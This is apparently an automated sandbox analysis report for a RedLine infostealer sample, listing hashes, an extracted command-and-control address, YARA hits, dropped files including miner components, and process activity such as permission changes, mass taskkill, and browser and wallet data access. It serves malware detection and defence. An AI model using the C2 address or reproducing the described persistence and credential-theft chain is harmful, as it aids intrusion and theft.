redline | 4b5b5a34e4b2dd842b5a097a93a47385316f68907fe5b512b494c6a608e446ee

Analysis

max time kernel
150s
max time network
148s
platform
windows7_x64
resource
win7-20240611-en
resource tags

arch:x64arch:x86image:win7-20240611-enlocale:en-usos:windows7-x64system
submitted
03-07-2024 01:16

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

4b5b5a34e4b2dd842b5a097a93a47385316f68907fe5b512b494c6a608e446ee.exe
Size

403KB
MD5

fdb35993f43fb0c0b3fadb2aef70b0be
SHA1

0881f937004e97e9aa3ee8688dccbd48ba2303ab
SHA256

4b5b5a34e4b2dd842b5a097a93a47385316f68907fe5b512b494c6a608e446ee
SHA512

0f0cf3744a6b0d07e54305c2dee7920c0d18ae10667abf0e2e6b25377b702f021fb77dfd716edd9f106aa53634493bf9a9b79ce00902e4e04abd825ec50f9277
SSDEEP

12288:RhWBAslGt0whBHsIOBJ0pokRqQ4s7My+5kpea2teQfx:XAwtZHHstJ0ecN4s+5tj

Score

10^/10

redline 1 discovery execution exploit infostealer pyinstaller spyware stealer

Malware Config

Extracted

Family

redline

Botnet

147.45.78.229:43674

Signatures

RedLine
RedLine Stealer is a malware family written in C#, first appearing in early 2020.
infostealer redline

RedLine payload 36 IoCs

Processes:

resource	yara_rule
behavioral1/memory/2384-1-0x0000000006BB0000-0x0000000006C20000-memory.dmp	family_redline
behavioral1/memory/2384-3-0x0000000006C20000-0x0000000006C8E000-memory.dmp	family_redline
behavioral1/memory/2384-5-0x0000000006C20000-0x0000000006C88000-memory.dmp	family_redline
behavioral1/memory/2384-7-0x0000000006C20000-0x0000000006C88000-memory.dmp	family_redline
behavioral1/memory/2384-11-0x0000000006C20000-0x0000000006C88000-memory.dmp	family_redline
behavioral1/memory/2384-17-0x0000000006C20000-0x0000000006C88000-memory.dmp	family_redline
behavioral1/memory/2384-21-0x0000000006C20000-0x0000000006C88000-memory.dmp	family_redline
behavioral1/memory/2384-27-0x0000000006C20000-0x0000000006C88000-memory.dmp	family_redline
behavioral1/memory/2384-31-0x0000000006C20000-0x0000000006C88000-memory.dmp	family_redline
behavioral1/memory/2384-41-0x0000000006C20000-0x0000000006C88000-memory.dmp	family_redline
behavioral1/memory/2384-47-0x0000000006C20000-0x0000000006C88000-memory.dmp	family_redline
behavioral1/memory/2384-51-0x0000000006C20000-0x0000000006C88000-memory.dmp	family_redline
behavioral1/memory/2384-53-0x0000000006C20000-0x0000000006C88000-memory.dmp	family_redline
behavioral1/memory/2384-49-0x0000000006C20000-0x0000000006C88000-memory.dmp	family_redline
behavioral1/memory/2384-45-0x0000000006C20000-0x0000000006C88000-memory.dmp	family_redline
behavioral1/memory/2384-43-0x0000000006C20000-0x0000000006C88000-memory.dmp	family_redline
behavioral1/memory/2384-37-0x0000000006C20000-0x0000000006C88000-memory.dmp	family_redline
behavioral1/memory/2384-65-0x0000000006C20000-0x0000000006C88000-memory.dmp	family_redline
behavioral1/memory/2384-35-0x0000000006C20000-0x0000000006C88000-memory.dmp	family_redline
behavioral1/memory/2384-33-0x0000000006C20000-0x0000000006C88000-memory.dmp	family_redline
behavioral1/memory/2384-29-0x0000000006C20000-0x0000000006C88000-memory.dmp	family_redline
behavioral1/memory/2384-25-0x0000000006C20000-0x0000000006C88000-memory.dmp	family_redline
behavioral1/memory/2384-23-0x0000000006C20000-0x0000000006C88000-memory.dmp	family_redline
behavioral1/memory/2384-19-0x0000000006C20000-0x0000000006C88000-memory.dmp	family_redline
behavioral1/memory/2384-15-0x0000000006C20000-0x0000000006C88000-memory.dmp	family_redline
behavioral1/memory/2384-13-0x0000000006C20000-0x0000000006C88000-memory.dmp	family_redline
behavioral1/memory/2384-9-0x0000000006C20000-0x0000000006C88000-memory.dmp	family_redline
behavioral1/memory/2384-4-0x0000000006C20000-0x0000000006C88000-memory.dmp	family_redline
behavioral1/memory/2384-39-0x0000000006C20000-0x0000000006C88000-memory.dmp	family_redline
behavioral1/memory/2384-59-0x0000000006C20000-0x0000000006C88000-memory.dmp	family_redline
behavioral1/memory/2384-67-0x0000000006C20000-0x0000000006C88000-memory.dmp	family_redline
behavioral1/memory/2384-63-0x0000000006C20000-0x0000000006C88000-memory.dmp	family_redline
behavioral1/memory/2384-61-0x0000000006C20000-0x0000000006C88000-memory.dmp	family_redline
behavioral1/memory/2384-57-0x0000000006C20000-0x0000000006C88000-memory.dmp	family_redline
behavioral1/memory/2384-55-0x0000000006C20000-0x0000000006C88000-memory.dmp	family_redline
\??\c:\programdata\1.exe	family_redline

Downloads MZ/PE file
Possible privilege escalation attempt 13 IoCs
exploit

Processes:

icacls.exeicacls.exeicacls.exetakeown.exeicacls.exeicacls.exetakeown.exetakeown.exeicacls.exeicacls.exeicacls.exeicacls.exeicacls.exe

pid process

6756 icacls.exe
6784 icacls.exe
3192 icacls.exe
4448 takeown.exe
6732 icacls.exe
3240 icacls.exe
4504 takeown.exe
5084 takeown.exe
6556 icacls.exe
6616 icacls.exe
6696 icacls.exe
6820 icacls.exe
3220 icacls.exe

pid	process
6756	icacls.exe
6784	icacls.exe
3192	icacls.exe
4448	takeown.exe
6732	icacls.exe
3240	icacls.exe
4504	takeown.exe
5084	takeown.exe
6556	icacls.exe
6616	icacls.exe
6696	icacls.exe
6820	icacls.exe
3220	icacls.exe

.NET Reactor proctector 35 IoCs

Detects an executable protected by an unregistered version of Eziriz's .NET Reactor.

Processes:

resource	yara_rule
behavioral1/memory/2384-1-0x0000000006BB0000-0x0000000006C20000-memory.dmp	net_reactor
behavioral1/memory/2384-3-0x0000000006C20000-0x0000000006C8E000-memory.dmp	net_reactor
behavioral1/memory/2384-5-0x0000000006C20000-0x0000000006C88000-memory.dmp	net_reactor
behavioral1/memory/2384-7-0x0000000006C20000-0x0000000006C88000-memory.dmp	net_reactor
behavioral1/memory/2384-11-0x0000000006C20000-0x0000000006C88000-memory.dmp	net_reactor
behavioral1/memory/2384-17-0x0000000006C20000-0x0000000006C88000-memory.dmp	net_reactor
behavioral1/memory/2384-21-0x0000000006C20000-0x0000000006C88000-memory.dmp	net_reactor
behavioral1/memory/2384-27-0x0000000006C20000-0x0000000006C88000-memory.dmp	net_reactor
behavioral1/memory/2384-31-0x0000000006C20000-0x0000000006C88000-memory.dmp	net_reactor
behavioral1/memory/2384-41-0x0000000006C20000-0x0000000006C88000-memory.dmp	net_reactor
behavioral1/memory/2384-47-0x0000000006C20000-0x0000000006C88000-memory.dmp	net_reactor
behavioral1/memory/2384-51-0x0000000006C20000-0x0000000006C88000-memory.dmp	net_reactor
behavioral1/memory/2384-53-0x0000000006C20000-0x0000000006C88000-memory.dmp	net_reactor
behavioral1/memory/2384-49-0x0000000006C20000-0x0000000006C88000-memory.dmp	net_reactor
behavioral1/memory/2384-45-0x0000000006C20000-0x0000000006C88000-memory.dmp	net_reactor
behavioral1/memory/2384-43-0x0000000006C20000-0x0000000006C88000-memory.dmp	net_reactor
behavioral1/memory/2384-37-0x0000000006C20000-0x0000000006C88000-memory.dmp	net_reactor
behavioral1/memory/2384-65-0x0000000006C20000-0x0000000006C88000-memory.dmp	net_reactor
behavioral1/memory/2384-35-0x0000000006C20000-0x0000000006C88000-memory.dmp	net_reactor
behavioral1/memory/2384-33-0x0000000006C20000-0x0000000006C88000-memory.dmp	net_reactor
behavioral1/memory/2384-29-0x0000000006C20000-0x0000000006C88000-memory.dmp	net_reactor
behavioral1/memory/2384-25-0x0000000006C20000-0x0000000006C88000-memory.dmp	net_reactor
behavioral1/memory/2384-23-0x0000000006C20000-0x0000000006C88000-memory.dmp	net_reactor
behavioral1/memory/2384-19-0x0000000006C20000-0x0000000006C88000-memory.dmp	net_reactor
behavioral1/memory/2384-15-0x0000000006C20000-0x0000000006C88000-memory.dmp	net_reactor
behavioral1/memory/2384-13-0x0000000006C20000-0x0000000006C88000-memory.dmp	net_reactor
behavioral1/memory/2384-9-0x0000000006C20000-0x0000000006C88000-memory.dmp	net_reactor
behavioral1/memory/2384-4-0x0000000006C20000-0x0000000006C88000-memory.dmp	net_reactor
behavioral1/memory/2384-39-0x0000000006C20000-0x0000000006C88000-memory.dmp	net_reactor
behavioral1/memory/2384-59-0x0000000006C20000-0x0000000006C88000-memory.dmp	net_reactor
behavioral1/memory/2384-67-0x0000000006C20000-0x0000000006C88000-memory.dmp	net_reactor
behavioral1/memory/2384-63-0x0000000006C20000-0x0000000006C88000-memory.dmp	net_reactor
behavioral1/memory/2384-61-0x0000000006C20000-0x0000000006C88000-memory.dmp	net_reactor
behavioral1/memory/2384-57-0x0000000006C20000-0x0000000006C88000-memory.dmp	net_reactor
behavioral1/memory/2384-55-0x0000000006C20000-0x0000000006C88000-memory.dmp	net_reactor

Executes dropped EXE 18 IoCs

Processes:

123.exeWmiic.exeWmiic.exeWmiic.exesvchosl.exesvchosl.exemig.exemigrate.exeWmiic.exeWmiic.exeWmiic.exeIntelConfigService.exeWrap.exeApplicationsFrameHost.exeSuperfetch.exeMSTask.exeMSTask.exe

pid	process
7632	123.exe
7796	Wmiic.exe
7912	Wmiic.exe
476
7956	Wmiic.exe
8008	svchosl.exe
8112	svchosl.exe
3280	mig.exe
6924	migrate.exe
2340	Wmiic.exe
2296	Wmiic.exe
1984	Wmiic.exe
264	IntelConfigService.exe
660	Wrap.exe
3176	ApplicationsFrameHost.exe
2628	Superfetch.exe
2620	MSTask.exe
1428	MSTask.exe

Loads dropped DLL 49 IoCs

Processes:

4b5b5a34e4b2dd842b5a097a93a47385316f68907fe5b512b494c6a608e446ee.execmd.exeWmiic.exesvchosl.execmd.execmd.exeWmiic.exeIntelConfigService.execmd.exeMSTask.exeMSTask.exe

pid	process
2384	4b5b5a34e4b2dd842b5a097a93a47385316f68907fe5b512b494c6a608e446ee.exe
7736	cmd.exe
7736	cmd.exe
7820
7736	cmd.exe
7936
7956	Wmiic.exe
8112	svchosl.exe
8112	svchosl.exe
8112	svchosl.exe
8112	svchosl.exe
8112	svchosl.exe
8112	svchosl.exe
8112	svchosl.exe
8112	svchosl.exe
8112	svchosl.exe
8112	svchosl.exe
8112	svchosl.exe
8112	svchosl.exe
2384	4b5b5a34e4b2dd842b5a097a93a47385316f68907fe5b512b494c6a608e446ee.exe
4888	cmd.exe
2860	cmd.exe
2860	cmd.exe
3080
2860	cmd.exe
2900
476
1984	Wmiic.exe
264	IntelConfigService.exe
3252	cmd.exe
264	IntelConfigService.exe
264	IntelConfigService.exe
2620	MSTask.exe
1428	MSTask.exe
1428	MSTask.exe
1428	MSTask.exe
1428	MSTask.exe
1428	MSTask.exe
1428	MSTask.exe
1428	MSTask.exe
1428	MSTask.exe
1428	MSTask.exe
1428	MSTask.exe
1428	MSTask.exe
1428	MSTask.exe
1428	MSTask.exe
1428	MSTask.exe
1428	MSTask.exe
1428	MSTask.exe

Modifies file permissions 1 TTPs 13 IoCs
discovery

File and Directory Permissions Modification
T1222

Processes:

icacls.exeicacls.exeicacls.exeicacls.exeicacls.exetakeown.exeicacls.exeicacls.exeicacls.exeicacls.exeicacls.exetakeown.exetakeown.exe

pid process

6616 icacls.exe
6696 icacls.exe
6756 icacls.exe
6820 icacls.exe
3220 icacls.exe
5084 takeown.exe
6732 icacls.exe
6784 icacls.exe
3240 icacls.exe
6556 icacls.exe
3192 icacls.exe
4448 takeown.exe
4504 takeown.exe
Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
spyware stealer

Data from Local System
T1005

Credentials In Files
T1552.001
Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
spyware

Data from Local System
T1005

Credentials In Files
T1552.001
Checks installed software on the system 1 TTPs
Looks up Uninstall key entries in the registry to enumerate software on the system.
discovery

Query Registry
T1012
Drops file in System32 directory 2 IoCs

Processes:

MSTask.exe

description ioc process

File created \??\c:\windows\system32\v.txtqvlgvgw9.tmp MSTask.exe
File created \??\c:\windows\system32\miners.txtsx84msyt.tmp MSTask.exe

pid	process
6616	icacls.exe
6696	icacls.exe
6756	icacls.exe
6820	icacls.exe
3220	icacls.exe
5084	takeown.exe
6732	icacls.exe
6784	icacls.exe
3240	icacls.exe
6556	icacls.exe
3192	icacls.exe
4448	takeown.exe
4504	takeown.exe

description	ioc	process
File created	\??\c:\windows\system32\v.txtqvlgvgw9.tmp	MSTask.exe
File created	\??\c:\windows\system32\miners.txtsx84msyt.tmp	MSTask.exe

Drops file in Windows directory 23 IoCs

Processes:

migrate.exeIntelConfigService.exeApplicationsFrameHost.exe

description	ioc	process
File opened for modification	C:\Windows\Tasks\config.json	migrate.exe
File created	C:\Windows\Tasks\MSTask.exe	migrate.exe
File created	C:\Windows\Tasks\MicrosoftPrt.exe	migrate.exe
File created	C:\Windows\Tasks\__tmp_rar_sfx_access_check_259446822	migrate.exe
File created	C:\Windows\Tasks\ApplicationsFrameHost.exe	migrate.exe
File created	C:\Windows\Tasks\config.json	migrate.exe
File created	C:\Windows\Tasks\IntelConfigService.exe	migrate.exe
File created	C:\Windows\Tasks\run.bat	migrate.exe
File opened for modification	C:\Windows\Tasks\Wrap.exe	migrate.exe
File opened for modification	C:\Windows\Tasks\ApplicationsFrameHost.exe	migrate.exe
File opened for modification	C:\Windows\Tasks\MSTask.exe	migrate.exe
File opened for modification	C:\Windows\Tasks\run.bat	migrate.exe
File opened for modification	C:\Windows\Tasks\Superfetch.exe	migrate.exe
File created	C:\Windows\Tasks\WinRing0x64.sys	migrate.exe
File opened for modification	C:\Windows\Tasks\WinRing0x64.sys	migrate.exe
File opened for modification	C:\Windows\Tasks	IntelConfigService.exe
File opened for modification	C:\Windows\Tasks\config.json	ApplicationsFrameHost.exe
File opened for modification	C:\Windows\Tasks\IntelConfigService.exe	migrate.exe
File created	C:\Windows\Tasks\Superfetch.exe	migrate.exe
File created	C:\Windows\Tasks\Wmiic.exe	migrate.exe
File opened for modification	C:\Windows\Tasks\Wmiic.exe	migrate.exe
File created	C:\Windows\Tasks\Wrap.exe	migrate.exe
File opened for modification	C:\Windows\Tasks\MicrosoftPrt.exe	migrate.exe

Command and Scripting Interpreter: PowerShell 1 TTPs 1 IoCs
Using powershell.exe command.
execution

PowerShell
T1059.001

Processes:

powershell.exe

pid process

2752 powershell.exe
Detects Pyinstaller 1 IoCs
pyinstaller

Processes:

resource yara_rule

\ProgramData\MicrosoftSystem\svchosl.exe pyinstaller
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082
Delays execution with timeout.exe 8 IoCs
evasion

Processes:

timeout.exetimeout.exetimeout.exetimeout.exetimeout.exetimeout.exetimeout.exetimeout.exe

pid process

1476 timeout.exe
1572 timeout.exe
2672 timeout.exe
3064 timeout.exe
7828 timeout.exe
7928 timeout.exe
5100 timeout.exe
6864 timeout.exe
Enumerates processes with tasklist 1 TTPs 1 IoCs

Process Discovery
T1057

Processes:

tasklist.exe

pid process

4972 tasklist.exe

pid	process
2752	powershell.exe

resource	yara_rule
\ProgramData\MicrosoftSystem\svchosl.exe	pyinstaller

pid	process
1476	timeout.exe
1572	timeout.exe
2672	timeout.exe
3064	timeout.exe
7828	timeout.exe
7928	timeout.exe
5100	timeout.exe
6864	timeout.exe

pid	process
4972	tasklist.exe

Kills process with taskkill 64 IoCs

evasion

Processes:

taskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exe

pid	process
4144	taskkill.exe
4460	taskkill.exe
1716	taskkill.exe
5240	taskkill.exe
7076	taskkill.exe
7420	taskkill.exe
4276	taskkill.exe
5364	taskkill.exe
7736	taskkill.exe
2944	taskkill.exe
1156	taskkill.exe
4376	taskkill.exe
4304	taskkill.exe
6204	taskkill.exe
6884	taskkill.exe
2744	taskkill.exe
7244	taskkill.exe
3452	taskkill.exe
4056	taskkill.exe
6312	taskkill.exe
3844	taskkill.exe
4936	taskkill.exe
5612	taskkill.exe
5936	taskkill.exe
7556	taskkill.exe
5752	taskkill.exe
3276	taskkill.exe
4676	taskkill.exe
4760	taskkill.exe
6488	taskkill.exe
7912	taskkill.exe
2172	taskkill.exe
4612	taskkill.exe
5300	taskkill.exe
372	taskkill.exe
7648	taskkill.exe
7800	taskkill.exe
1688	taskkill.exe
4444	taskkill.exe
6620	taskkill.exe
6684	taskkill.exe
5840	taskkill.exe
2024	taskkill.exe
4232	taskkill.exe
888	taskkill.exe
6272	taskkill.exe
2980	taskkill.exe
6800	taskkill.exe
5492	taskkill.exe
7996	taskkill.exe
2700	taskkill.exe
5576	taskkill.exe
2276	taskkill.exe
1684	taskkill.exe
3632	taskkill.exe
5436	taskkill.exe
7304	taskkill.exe
7560	taskkill.exe
8136	taskkill.exe
2324	taskkill.exe
7632	taskkill.exe
4576	taskkill.exe
5168	taskkill.exe
6056	taskkill.exe

Runs net.exe

Suspicious behavior: EnumeratesProcesses 64 IoCs

Processes:

4b5b5a34e4b2dd842b5a097a93a47385316f68907fe5b512b494c6a608e446ee.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exeIntelConfigService.exeSuperfetch.exeMSTask.exe

pid	process
2384	4b5b5a34e4b2dd842b5a097a93a47385316f68907fe5b512b494c6a608e446ee.exe
3472	powershell.exe
3688	powershell.exe
2752	powershell.exe
2536	powershell.exe
6304	powershell.exe
264	IntelConfigService.exe
264	IntelConfigService.exe
264	IntelConfigService.exe
264	IntelConfigService.exe
264	IntelConfigService.exe
264	IntelConfigService.exe
264	IntelConfigService.exe
264	IntelConfigService.exe
264	IntelConfigService.exe
264	IntelConfigService.exe
264	IntelConfigService.exe
264	IntelConfigService.exe
264	IntelConfigService.exe
264	IntelConfigService.exe
264	IntelConfigService.exe
264	IntelConfigService.exe
264	IntelConfigService.exe
264	IntelConfigService.exe
264	IntelConfigService.exe
264	IntelConfigService.exe
264	IntelConfigService.exe
264	IntelConfigService.exe
264	IntelConfigService.exe
264	IntelConfigService.exe
264	IntelConfigService.exe
264	IntelConfigService.exe
264	IntelConfigService.exe
264	IntelConfigService.exe
264	IntelConfigService.exe
264	IntelConfigService.exe
264	IntelConfigService.exe
264	IntelConfigService.exe
264	IntelConfigService.exe
264	IntelConfigService.exe
264	IntelConfigService.exe
264	IntelConfigService.exe
264	IntelConfigService.exe
2628	Superfetch.exe
264	IntelConfigService.exe
264	IntelConfigService.exe
264	IntelConfigService.exe
264	IntelConfigService.exe
264	IntelConfigService.exe
264	IntelConfigService.exe
264	IntelConfigService.exe
264	IntelConfigService.exe
264	IntelConfigService.exe
264	IntelConfigService.exe
264	IntelConfigService.exe
264	IntelConfigService.exe
2628	Superfetch.exe
1428	MSTask.exe
1428	MSTask.exe
1428	MSTask.exe
1428	MSTask.exe
1428	MSTask.exe
1428	MSTask.exe
1428	MSTask.exe

Suspicious use of AdjustPrivilegeToken 64 IoCs

Processes:

4b5b5a34e4b2dd842b5a097a93a47385316f68907fe5b512b494c6a608e446ee.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exepowershell.exepowershell.exepowershell.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetakeown.exetasklist.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exepowershell.exepowershell.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exeApplicationsFrameHost.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exe

description	pid	process
Token: SeDebugPrivilege	2384	4b5b5a34e4b2dd842b5a097a93a47385316f68907fe5b512b494c6a608e446ee.exe
Token: SeDebugPrivilege	2980	taskkill.exe
Token: SeDebugPrivilege	2172	taskkill.exe
Token: SeDebugPrivilege	672	taskkill.exe
Token: SeDebugPrivilege	1688	taskkill.exe
Token: SeDebugPrivilege	2268	taskkill.exe
Token: SeDebugPrivilege	692	taskkill.exe
Token: SeDebugPrivilege	1156	taskkill.exe
Token: SeDebugPrivilege	888	taskkill.exe
Token: SeDebugPrivilege	1972	taskkill.exe
Token: SeDebugPrivilege	2744	taskkill.exe
Token: SeDebugPrivilege	2324	taskkill.exe
Token: SeDebugPrivilege	3140	taskkill.exe
Token: SeDebugPrivilege	3472	powershell.exe
Token: SeDebugPrivilege	3688	powershell.exe
Token: SeDebugPrivilege	2752	powershell.exe
Token: SeDebugPrivilege	2736	taskkill.exe
Token: SeDebugPrivilege	4144	taskkill.exe
Token: SeDebugPrivilege	4184	taskkill.exe
Token: SeDebugPrivilege	4248	taskkill.exe
Token: SeDebugPrivilege	4308	taskkill.exe
Token: SeDebugPrivilege	4376	taskkill.exe
Token: SeTakeOwnershipPrivilege	4504	takeown.exe
Token: SeDebugPrivilege	4972	tasklist.exe
Token: SeDebugPrivilege	2856	taskkill.exe
Token: SeDebugPrivilege	2848	taskkill.exe
Token: SeDebugPrivilege	5220	taskkill.exe
Token: SeDebugPrivilege	5340	taskkill.exe
Token: SeDebugPrivilege	5444	taskkill.exe
Token: SeDebugPrivilege	5576	taskkill.exe
Token: SeDebugPrivilege	5660	taskkill.exe
Token: SeDebugPrivilege	5752	taskkill.exe
Token: SeDebugPrivilege	5840	taskkill.exe
Token: SeDebugPrivilege	5916	taskkill.exe
Token: SeDebugPrivilege	6024	taskkill.exe
Token: SeDebugPrivilege	2452	taskkill.exe
Token: SeDebugPrivilege	2536	powershell.exe
Token: SeDebugPrivilege	6304	powershell.exe
Token: SeDebugPrivilege	3276	taskkill.exe
Token: SeDebugPrivilege	3452	taskkill.exe
Token: SeDebugPrivilege	4056	taskkill.exe
Token: SeDebugPrivilege	4576	taskkill.exe
Token: SeDebugPrivilege	2476	taskkill.exe
Token: SeDebugPrivilege	1256	taskkill.exe
Token: SeDebugPrivilege	5332	taskkill.exe
Token: SeDebugPrivilege	6108	taskkill.exe
Token: SeDebugPrivilege	6312	taskkill.exe
Token: SeDebugPrivilege	6800	taskkill.exe
Token: SeDebugPrivilege	2276	taskkill.exe
Token: SeDebugPrivilege	2024	taskkill.exe
Token: SeLockMemoryPrivilege	3176	ApplicationsFrameHost.exe
Token: SeDebugPrivilege	1420	taskkill.exe
Token: SeDebugPrivilege	1684	taskkill.exe
Token: SeDebugPrivilege	980	taskkill.exe
Token: SeDebugPrivilege	1152	taskkill.exe
Token: SeDebugPrivilege	4676	taskkill.exe
Token: SeDebugPrivilege	4232	taskkill.exe
Token: SeDebugPrivilege	4180	taskkill.exe
Token: SeDebugPrivilege	4612	taskkill.exe
Token: SeDebugPrivilege	3844	taskkill.exe
Token: SeDebugPrivilege	4276	taskkill.exe
Token: SeDebugPrivilege	3868	taskkill.exe
Token: SeDebugPrivilege	4532	taskkill.exe
Token: SeDebugPrivilege	3904	taskkill.exe

Suspicious use of FindShellTrayWindow 7 IoCs

Processes:

IntelConfigService.exeApplicationsFrameHost.exeSuperfetch.exe

pid process

264 IntelConfigService.exe
264 IntelConfigService.exe
264 IntelConfigService.exe
3176 ApplicationsFrameHost.exe
2628 Superfetch.exe
2628 Superfetch.exe
2628 Superfetch.exe

pid	process
264	IntelConfigService.exe
264	IntelConfigService.exe
264	IntelConfigService.exe
3176	ApplicationsFrameHost.exe
2628	Superfetch.exe
2628	Superfetch.exe
2628	Superfetch.exe

Suspicious use of WriteProcessMemory 64 IoCs

Processes:

4b5b5a34e4b2dd842b5a097a93a47385316f68907fe5b512b494c6a608e446ee.exe123.execmd.exeWmiic.exesvchosl.exesvchosl.exenet.execmd.execmd.execmd.execmd.exe

description	pid	process	target process
PID 2384 wrote to memory of 7632	2384	4b5b5a34e4b2dd842b5a097a93a47385316f68907fe5b512b494c6a608e446ee.exe	123.exe
PID 2384 wrote to memory of 7632	2384	4b5b5a34e4b2dd842b5a097a93a47385316f68907fe5b512b494c6a608e446ee.exe	123.exe
PID 2384 wrote to memory of 7632	2384	4b5b5a34e4b2dd842b5a097a93a47385316f68907fe5b512b494c6a608e446ee.exe	123.exe
PID 2384 wrote to memory of 7632	2384	4b5b5a34e4b2dd842b5a097a93a47385316f68907fe5b512b494c6a608e446ee.exe	123.exe
PID 7632 wrote to memory of 7736	7632	123.exe	cmd.exe
PID 7632 wrote to memory of 7736	7632	123.exe	cmd.exe
PID 7632 wrote to memory of 7736	7632	123.exe	cmd.exe
PID 7632 wrote to memory of 7736	7632	123.exe	cmd.exe
PID 7736 wrote to memory of 7796	7736	cmd.exe	Wmiic.exe
PID 7736 wrote to memory of 7796	7736	cmd.exe	Wmiic.exe
PID 7736 wrote to memory of 7796	7736	cmd.exe	Wmiic.exe
PID 7736 wrote to memory of 7796	7736	cmd.exe	Wmiic.exe
PID 7736 wrote to memory of 7828	7736	cmd.exe	timeout.exe
PID 7736 wrote to memory of 7828	7736	cmd.exe	timeout.exe
PID 7736 wrote to memory of 7828	7736	cmd.exe	timeout.exe
PID 7736 wrote to memory of 7828	7736	cmd.exe	timeout.exe
PID 7736 wrote to memory of 7912	7736	cmd.exe	Wmiic.exe
PID 7736 wrote to memory of 7912	7736	cmd.exe	Wmiic.exe
PID 7736 wrote to memory of 7912	7736	cmd.exe	Wmiic.exe
PID 7736 wrote to memory of 7912	7736	cmd.exe	Wmiic.exe
PID 7736 wrote to memory of 7928	7736	cmd.exe	timeout.exe
PID 7736 wrote to memory of 7928	7736	cmd.exe	timeout.exe
PID 7736 wrote to memory of 7928	7736	cmd.exe	timeout.exe
PID 7736 wrote to memory of 7928	7736	cmd.exe	timeout.exe
PID 7956 wrote to memory of 8008	7956	Wmiic.exe	svchosl.exe
PID 7956 wrote to memory of 8008	7956	Wmiic.exe	svchosl.exe
PID 7956 wrote to memory of 8008	7956	Wmiic.exe	svchosl.exe
PID 8008 wrote to memory of 8112	8008	svchosl.exe	svchosl.exe
PID 8008 wrote to memory of 8112	8008	svchosl.exe	svchosl.exe
PID 8008 wrote to memory of 8112	8008	svchosl.exe	svchosl.exe
PID 7736 wrote to memory of 1176	7736	cmd.exe	net.exe
PID 7736 wrote to memory of 1176	7736	cmd.exe	net.exe
PID 7736 wrote to memory of 1176	7736	cmd.exe	net.exe
PID 7736 wrote to memory of 1176	7736	cmd.exe	net.exe
PID 8112 wrote to memory of 2000	8112	svchosl.exe	cmd.exe
PID 8112 wrote to memory of 2000	8112	svchosl.exe	cmd.exe
PID 8112 wrote to memory of 2000	8112	svchosl.exe	cmd.exe
PID 1176 wrote to memory of 2096	1176	net.exe	net1.exe
PID 1176 wrote to memory of 2096	1176	net.exe	net1.exe
PID 1176 wrote to memory of 2096	1176	net.exe	net1.exe
PID 1176 wrote to memory of 2096	1176	net.exe	net1.exe
PID 2000 wrote to memory of 2980	2000	cmd.exe	taskkill.exe
PID 2000 wrote to memory of 2980	2000	cmd.exe	taskkill.exe
PID 2000 wrote to memory of 2980	2000	cmd.exe	taskkill.exe
PID 8112 wrote to memory of 1908	8112	svchosl.exe	cmd.exe
PID 8112 wrote to memory of 1908	8112	svchosl.exe	cmd.exe
PID 8112 wrote to memory of 1908	8112	svchosl.exe	cmd.exe
PID 1908 wrote to memory of 2172	1908	cmd.exe	taskkill.exe
PID 1908 wrote to memory of 2172	1908	cmd.exe	taskkill.exe
PID 1908 wrote to memory of 2172	1908	cmd.exe	taskkill.exe
PID 8112 wrote to memory of 2572	8112	svchosl.exe	cmd.exe
PID 8112 wrote to memory of 2572	8112	svchosl.exe	cmd.exe
PID 8112 wrote to memory of 2572	8112	svchosl.exe	cmd.exe
PID 2572 wrote to memory of 672	2572	cmd.exe	taskkill.exe
PID 2572 wrote to memory of 672	2572	cmd.exe	taskkill.exe
PID 2572 wrote to memory of 672	2572	cmd.exe	taskkill.exe
PID 8112 wrote to memory of 2448	8112	svchosl.exe	cmd.exe
PID 8112 wrote to memory of 2448	8112	svchosl.exe	cmd.exe
PID 8112 wrote to memory of 2448	8112	svchosl.exe	cmd.exe
PID 2448 wrote to memory of 1688	2448	cmd.exe	taskkill.exe
PID 2448 wrote to memory of 1688	2448	cmd.exe	taskkill.exe
PID 2448 wrote to memory of 1688	2448	cmd.exe	taskkill.exe
PID 8112 wrote to memory of 444	8112	svchosl.exe	cmd.exe
PID 8112 wrote to memory of 444	8112	svchosl.exe	cmd.exe

C:\Users\Admin\AppData\Local\Temp\4b5b5a34e4b2dd842b5a097a93a47385316f68907fe5b512b494c6a608e446ee.exe
"C:\Users\Admin\AppData\Local\Temp\4b5b5a34e4b2dd842b5a097a93a47385316f68907fe5b512b494c6a608e446ee.exe"
1⤵
- Loads dropped DLL
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:2384

C:\users\123.exe
"C:\users\123.exe"
2⤵
- Executes dropped EXE
